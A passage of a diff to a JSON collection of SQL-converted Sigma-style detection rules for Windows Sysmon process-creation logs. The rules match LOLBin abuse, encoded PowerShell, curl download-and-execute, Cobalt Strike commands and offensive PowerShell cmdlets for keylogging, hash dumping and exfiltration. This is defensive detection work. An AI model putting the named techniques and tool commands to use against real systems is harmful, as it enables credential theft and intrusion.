'%-a%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_wfc.yml" + "filename": "proc_creation_win_lolbin_replace.yml" }, { - "title": "REGISTER_APP.VBS Proxy Execution", - "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", - "status": "experimental", - "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", + "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", + "status": "test", + "description": "dotnet.exe will execute any DLL and execute unsigned code", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.t1218" ], "falsepositives": [ - "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_register_app.yml" + "filename": "proc_creation_win_lolbin_dotnet.yml" + }, + { + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "status": "test", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", + "author": "Sander Wiebing", + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "falsepositives": [ + "Legitimate administration activity" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + }, + { + "title": "PowerShell Base64 Encoded Invoke Keyword", + "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "status": "test", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "Obfuscated IP Via CLI", - "id": "56d19cb4-6414-4769-9644-1ed35ffbb148", + "title": "Service Started/Stopped Via Wmic.EXE", + "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", "status": "experimental", - "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", + "description": "Detects usage of wmic to start or stop a service", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" + "filename": "proc_creation_win_wmic_service_manipulation.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", + "title": "Suspicious Execution From GUID Like Folder Names", + "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1528", - "attack.t1036.003" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\{%' ESCAPE '\\' AND Image LIKE '%}\\\\%' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", "status": "experimental", - "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "title": "HackTool - Certify Execution", + "id": "762f2482-ff21-4970-8939-0aa317a886bb", "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR CommandLine LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": "proc_creation_win_hktl_certify.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "Stop Windows Service Via Net.EXE", + "id": "88872991-7445-4a22-90b2-a3adadb0e827", + "status": "experimental", + "description": "Detects the stopping of a Windows service", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_net_stop_service.yml" }, { - "title": "SQL Client Tools PowerShell Session Detection", - "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "title": "Curl Download And Execute Combination", + "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "status": "test", - "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.communitly", + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1127" + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "status": "test", - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "status": "experimental", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1574.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "Deleted Data Overwritten Via Cipher.EXE", + "id": "4b046706-5789-4673-b111-66f25fe99534", + "status": "experimental", + "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.impact", + "attack.t1485" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'CIPHER.EXE' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Operator Bloopers Cobalt Strike Commands", + "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", + "status": "experimental", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "Potential Recon Activity Using Wevtutil", - "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", "status": "experimental", - "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the utility by administrators to query the event log" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE '%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE 